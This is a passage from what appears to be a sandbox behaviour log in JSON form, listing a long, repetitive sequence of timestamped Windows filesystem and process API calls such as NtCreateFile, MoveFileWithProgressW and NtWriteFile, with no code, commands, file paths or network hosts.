
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,332", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,342", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,362", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,362", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,382", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,382", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,392", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,392", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,402", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,412", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:48,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:48,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,462", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,462", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:48,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,552", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,562", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:48,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,652", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:48,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:48,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
